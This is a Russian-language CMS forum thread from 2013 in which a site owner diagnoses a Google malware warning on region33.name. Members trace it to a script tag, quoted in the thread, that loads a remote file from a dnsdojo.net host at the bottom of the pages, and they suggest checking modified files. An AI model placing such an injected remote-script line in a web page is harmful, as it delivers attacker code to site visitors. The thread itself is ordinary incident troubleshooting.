Письмо от гугла.

Где искать файлы?

 
Посетитель
small user social cms
МедальАвторитет форума
Сообщений: 1012
пришло письмо от гугла. типо вирус у меня
Уважаемый владелец сайта или вебмастер region33.name, Недавно мы обнаружили, что некоторые из ваших страниц может привести к пользователям быть заражен вредоносными программами. Мы начали показ страница предупреждения для пользователей, которые посещают эти страницы, щелкнув результатов поиска на Google.com. Ниже приведены некоторые примеры Url на вашем сайте, который может привести к пользователям, будут инфицированы (пробел вставляется для предотвращения случайного нажатия в случае, если ваш почтовый клиент авто-ссылки Url):
http://region33 .name/
http://region33 .name/r1
http://region33 .name/go/
но я так и не понял где искать эти страницы.
Посетитель
small user social cms
Медаль
Сообщений: 436
у себя на сайте ищи, адреса же дали.
Реклама
cms
Посетитель
small user social cms
Медаль
Сообщений: 436
убари рекламу которая может вирусы давать и всякие левые запииси пользователей
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2592
Похоже на то, что это письмо - фейк.
Во первых, гугл достаточно хорошо умеет писть по русски со всеми спряжениями и падежами.
Во вторых, посмотрел на выдачу этого сайта в гугле - никаких предупреждений об опасности.
В третьих, вот этот пассаж
nedoriko:
(пробел вставляется для предотвращения случайного нажатия в случае, если ваш почтовый клиент авто-ссылки Url):
- вообще цирк, они бы не стали такую чушь пороть.)))
Редактировалось: 1 раз (Последний: 5 мая 2013 в 16:05)
Посетитель
small user social cms
Медаль
Сообщений: 105
Нил:
Похоже на то, что это письмо - фейк.
Похоже, что не фейк. При попытке перейти на сайт регион33 Chrome выдает предупреждение:
Веб-сайт, на который вы хотите перейти, содержит вредоносное ПО!
Google Chrome заблокировал доступ к region33.name
Все будет хорошо :)
Посетитель
small user social cms
МедальАвторитет форума
Сообщений: 1012
Письмо на английском было. Это автопереводчик. Но ссылки какието несуществующие. К примеру при попытке войти на страницу р1 открывается главная.
Сейчас буду пробовать рекламу по очереди отключать.
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2592
Nery:
При попытке перейти на сайт регион33 Chrome выдает предупреждение:
Да действительно. Блокируется.

а так https://www.google.ru/search?client=opera&q=site:http://region33.name&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest
Чисто
Посетитель
small user social cms
МедальАвторитет форума
Сообщений: 1012
а сецчас ваще запутался. Проверял свой сайт в онлайне на вирусы. А мне выдоло вот
1. http://region33.name/go, тип файла: html
• зараженный сайт по версии гугла: region33.name
• зараженный сайт по версии гугла: www.region33.name
• зараженный сайт по версии гугла: nedoriko.ru
Какимто образом они и другой сайт к списку добавили?
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2592
Письмо от гугла.

Eset Smart Security выдает.

Соглашусь с
Константин Г.:
Константин Г.
Посетитель


Сообщений: 269
#3 - Сегодня в 15:53
Цитировать выделенное Ответить
убари рекламу которая может вирусы давать и всякие левые запииси пользователей
Редактировалось: 1 раз (Последний: 5 мая 2013 в 17:11)
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2592
nedoriko:
• зараженный сайт по версии гугла: nedoriko.ru

кстати, да. этотсайт тоже блокируется и хроми нод32
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2592
У тебя на обоих сайтах сайта в самом низу код на который нод32 и указывает

<script src="http://gvxsgmk. dnsdojo. net /rsize.js"> </script>

А
Посетитель
small user social cms
МедальАвторитет форумаПочетный донор проекта
Сообщений: 1356
Смотрите по FTP измененные файлы,либо индексы либо в темплейте. Возможно дописали в js файлы с расширением на запись.
Фриланс по Intantcms 1 и 2 версий.Писать в ЛС. Отзывы заказчиков
Посетитель
small user social cms
Сообщений: 4
Смотрите в файле index.php
В самом конце этого файла прописывается код.
У меня было такое.
Посетитель
small user social cms
МедальАвторитет форума
Сообщений: 1012
интересная штука этот яндексвебмастер.
этот пользователь
himik912 с айпи 31.28.212.162
а вот список страниц с вирусами
Дата последней проверки

http://region33.name/victorina/vopros166237.html
Поведенческий анализ
06.05.2013
http://region33.name/victorina/vopros162175.html
Поведенческий анализ
06.05.2013
http://region33.name/victorina/vopros1446.html
Поведенческий анализ
06.05.2013
http://region33.name/users/himik912
Поведенческий анализ

ну мы то знаем что вопросы лежат в одном файле. и еслиб викторина была заряженна то все вопросы бы светились.
или я ошибаюсь?
Посетитель
small user social cms
МедальАвторитет форума
Сообщений: 1012
Евген:
Смотрите в файле index.php
там ничего нету.
В начало страницы
Предыдущая темаСледующая тема Перейти на форум:
Быстрый ответ
Чтобы писать на форуме, зарегистрируйтесь или авторизуйтесь.